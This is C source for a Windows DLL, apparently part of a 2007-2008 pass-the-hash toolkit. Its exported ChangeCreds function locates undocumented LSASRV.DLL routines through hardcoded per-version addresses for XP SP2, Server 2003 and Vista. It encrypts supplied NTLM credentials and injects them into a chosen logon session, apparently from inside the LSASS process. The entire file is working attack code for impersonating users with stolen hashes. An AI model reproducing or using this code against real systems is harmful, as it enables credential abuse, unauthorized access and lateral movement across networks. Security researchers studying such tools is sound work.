// $Id: iamdll.c,v 1.3 2008/01/21 15:31:10 hochoa Exp $

/*
 *  
 *
 * Description: 
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/


#include <windows.h>
#include <ntsecapi.h>
#include <stdio.h>
#include "iamdll.h"

// Windows XP SP2 LSASRV.DLL Addresses
#define LSASRVDLL_WINXPSP2_FILEVERSION_MS		0x50001
#define LSASRVDLL_WINXPSP2_FILEVERSION_LS		0xA280BA0
#define LSASRVDLL_LSAADDCREDENTIAL_ADDRESS_XPSP2	0x75747BCC
#define LSASRVDLL_LSAENCRYPTMEMORY_ADDRESS_XPSP2     	0x757456C2


// Windows Server 2003 LSASRV.DLL Addresses
#define LSASRVDLL_SERVER2003_FILEVERSION_MS		0x50002
#define LSASRVDLL_SERVER2003_FILEVERSION_LS		0xECE0000
#define LSASRVDLL_LSAADDCREDENTIAL_ADDRESS_SERVER2003	0x7430C600
#define LSASRVDLL_LSAENCRYPTMEMORY_ADDRESS_SERVER2003   0x742E5070


// Windows Vista LSASRV.DLL Addresses
#define LSASRVDLL_VISTA_FILEVERSION_MS			0x60000
#define LSASRVDLL_VISTA_FILEVERSION_LS			0x17704002
#define LSASRVDLL_LSAADDCREDENTIAL_ADDRESS_VISTA	0x7430C600-0x73000000
#define LSASRVDLL_LSAENCRYPTMEMORY_ADDRESS_VISTA   	0x742E5070-0x73000000

// Typedef for Ptr to LSASRV.DLL 'LsaEncryptMemory' internal function
typedef void  (__stdcall*LsaEncryptMemoryFunction)(unsigned char* buff, unsigned long len, int mode);

// typedef for Ptr to LSASRV.DLL 'AddCredential' internal function
typedef DWORD  (__stdcall* ADDCREDENTIAL_FUNC)(PLUID LogonId, DWORD AuthenticationPackage, DWORD PrimaryKeyValuePtr, DWORD CredsPtr);

					
// Changes the credentials
void __declspec(dllexport) ChangeCreds(REMOTE_INFO* pinfo)
{
unsigned long authpkgid;
HMODULE hmod;
struct LUID_t luid;
char buffer[20];
struct STRING_t primaryKey;
struct STRING_t MSVcredsptr;
ADDCREDENTIAL_FUNC pAddCredential;
struct CREDENTIALS_wrapper2 credentialsWrapper;
LsaEncryptMemoryFunction LsaEncryptMemory;
DWORD dwLSASRVDLLBaseAddr;


	// this is the packageID for MSV1_0, it is hardcoded because it appears to
	// be always the same. It is possible to obtain in runtime anyways.
	authpkgid = 2;

	// Did we received the address of AC & EM functions?
	if( pinfo->useAddresses == 1 ) {
		// Pointer to LSA's function 'AddCredential'
		pAddCredential = (ADDCREDENTIAL_FUNC)pinfo->AC_Address;
		// Pointer to LSA's function 'LSAEncryptMemory'
		LsaEncryptMemory = (LsaEncryptMemoryFunction)pinfo->EM_Address;
	}
	else 
	{

		if( pinfo->dwDLL_MS == LSASRVDLL_WINXPSP2_FILEVERSION_MS &&
				pinfo->dwDLL_LS == LSASRVDLL_WINXPSP2_FILEVERSION_LS ) {

			// Pointer to LSA's function 'AddCredential' 
			pAddCredential = (ADDCREDENTIAL_FUNC)LSASRVDLL_LSAADDCREDENTIAL_ADDRESS_XPSP2;
			// Pointer to LSA's function 'LSAEncryptMemory' used to encrypt credentials BLOB
			LsaEncryptMemory = (LsaEncryptMemoryFunction)LSASRVDLL_LSAENCRYPTMEMORY_ADDRESS_XPSP2;
		
		}
		else
		if( pinfo->dwDLL_MS == LSASRVDLL_SERVER2003_FILEVERSION_MS &&
				pinfo->dwDLL_LS == LSASRVDLL_SERVER2003_FILEVERSION_LS ) {

			// Pointer to LSA's function 'AddCredential' Function
			pAddCredential = (ADDCREDENTIAL_FUNC)LSASRVDLL_LSAADDCREDENTIAL_ADDRESS_SERVER2003;
			// Pointer to LSA's function 'LSAEncryptMemory' used to encrypt credentials BLOB
			LsaEncryptMemory = (LsaEncryptMemoryFunction)LSASRVDLL_LSAENCRYPTMEMORY_ADDRESS_SERVER2003;

		}
		else
		if( pinfo->dwDLL_MS == LSASRVDLL_VISTA_FILEVERSION_MS &&
				pinfo->dwDLL_LS == LSASRVDLL_VISTA_FILEVERSION_LS ) {
	
			// LSASRV.DLL changes its base address on every boot
			// So obtain the current base addr
			dwLSASRVDLLBaseAddr = (DWORD)GetModuleHandle("LSASRV.DLL");
			if( dwLSASRVDLLBaseAddr == 0 ) {
				// This should never happen :)
				return;
			}
			// Pointer to LSA's function 'AddCredential' Function
			pAddCredential = (ADDCREDENTIAL_FUNC)(LSASRVDLL_LSAADDCREDENTIAL_ADDRESS_VISTA+dwLSASRVDLLBaseAddr);
			// Pointer to LSA's function 'LSAEncryptMemory' used to encrypt credentials BLOB
			LsaEncryptMemory = (LsaEncryptMemoryFunction)(LSASRVDLL_LSAENCRYPTMEMORY_ADDRESS_VISTA+dwLSASRVDLLBaseAddr);

		}
		else {
			// DLL version is unknown
			return;
		}
	}




	// create credentals BLOB
	MSVcredsptr.len = sizeof(struct CREDENTIALS_t);
	MSVcredsptr.maxlen = sizeof(struct CREDENTIALS_t);
	MSVcredsptr.buffer = (char*)&pinfo->creds;

	// Encrypt Credentials
	LsaEncryptMemory( (char*)&pinfo->creds,sizeof(struct CREDENTIALS_t), 1);

	primaryKey.len = 7;
	primaryKey.maxlen = 8;
	primaryKey.buffer = buffer;

	// This is the current Logon ID
	luid.high = 0;
	luid.low = pinfo->logonid;
	strcpy(buffer, "Primary");

	// Add Credentials to the current Logon Session
	pAddCredential(&luid, authpkgid, (DWORD)&primaryKey, (DWORD)&MSVcredsptr);

}


